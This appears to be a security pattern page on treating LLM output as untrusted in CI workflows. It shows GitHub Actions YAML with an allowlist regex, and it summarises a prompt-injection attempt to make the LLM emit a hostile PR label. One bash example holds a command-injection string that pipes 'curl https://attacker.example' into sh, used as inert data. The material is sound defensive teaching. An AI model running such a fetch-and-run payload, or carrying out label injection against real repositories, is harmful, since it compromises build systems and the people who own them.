
PATTERN Cited by 1 source

LLM output as untrusted input

Problem: An LLM exposed to attacker-controllable input (even one well isolated via patterns/untrusted-input-via-file-not-prompt) can still produce output that reflects or carries injected instructions. If downstream steps consume that output verbatim (as a shell argument, a label name, a command, a file path), the injection propagates.

Pattern: Treat the LLM's output as untrusted. Validate structure before using it; fail-closed on mismatch.

Shape

From Datadog's 2026-03-09 reference workflow:

- name: Read Claude's output
  id: category
  run: |
    read -r CATEGORY < category.txt || true
    if [[ "$CATEGORY" =~ ^(new-feature|bug-fix|documentation)$ ]]; then
      echo "value=$CATEGORY" >> "$GITHUB_OUTPUT"
    else
      echo "::error::Unexpected category"
      exit 1
    fi

- name: Apply label
  env:
    PR_NUMBER: ${{ github.event.pull_request.number }}
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    CATEGORY: ${{ steps.category.outputs.value }}
  run: gh pr edit "$PR_NUMBER" --add-label "kind/$CATEGORY"

Three things happening:

  1. Regex validator pins the output to an enumerable, known-safe set (^(new-feature|bug-fix|documentation)$). Fail-closed if the LLM returns anything else.
  2. Fresh env: interpolation on the downstream step: the validated output goes through the env-var pattern, not string interpolation, so it composes with script-injection defences.
  3. Least-privilege secret placement: GH_TOKEN is scoped to the step that needs it, not the job or workflow.
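The allowlist check in step 1 can be exercised on its own. A minimal bash sketch (validate_category is a hypothetical helper name, not from the workflow; the regex is the same enumerable set):

```shell
#!/usr/bin/env bash
# Allowlist validation of LLM output, mirroring the workflow's regex gate.
# Anything outside the known-safe set is rejected with a non-zero exit.
validate_category() {
  local category="$1"
  if [[ "$category" =~ ^(new-feature|bug-fix|documentation)$ ]]; then
    printf '%s\n' "$category"
  else
    printf 'error: unexpected category: %s\n' "$category" >&2
    return 1
  fi
}

validate_category "bug-fix"                        # accepted
validate_category "HackerBot Claw" || echo "rejected"
```

Fail-closed is the key property: an empty file, a multi-word answer, or prose wrapped around the category all land in the else branch and stop the job.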

Why it matters

Datadog's framing: "Consider the LLM output as untrusted and apply similar sanitization that you would apply for untrusted user data such as a PR title." Concretely, if the LLM can be induced to output a label name like HackerBot Claw 🦞 Reviewed 🛡️ (as hackerbot-claw attempted), and your downstream step is gh pr edit --add-label "$CATEGORY", the validator is what stops the attack from succeeding even if the LLM itself was compromised.
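The env-var half of the defence is worth seeing in isolation: an environment variable expands after bash has already parsed the command line, so even a hostile value stays one inert argument. A minimal sketch (the payload string is illustrative, not from the incident):

```shell
# A value that would be a command-injection payload if spliced into the
# script text via ${{ ... }} interpolation before bash parses it:
CATEGORY='"; curl https://attacker.example | sh; echo "'

# Passed as a quoted environment-variable expansion, it is just data:
# bash has already split the command into words, so the payload cannot
# introduce new commands, only one odd-looking argument.
printf 'argv[1] = <%s>\n' "kind/$CATEGORY"
```

Combined with the allowlist, a payload like this never even reaches the labelling step: it fails the regex first.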

Sibling patterns

One of five defensive patterns from Datadog's 2026-03-09 post:

  1. Use recent models.
  2. patterns/untrusted-input-via-file-not-prompt.
  3. LLM output as untrusted input (this pattern).
  4. patterns/minimally-scoped-llm-tools.
  5. Keep secrets out of the LLM's step environment.

Seen in
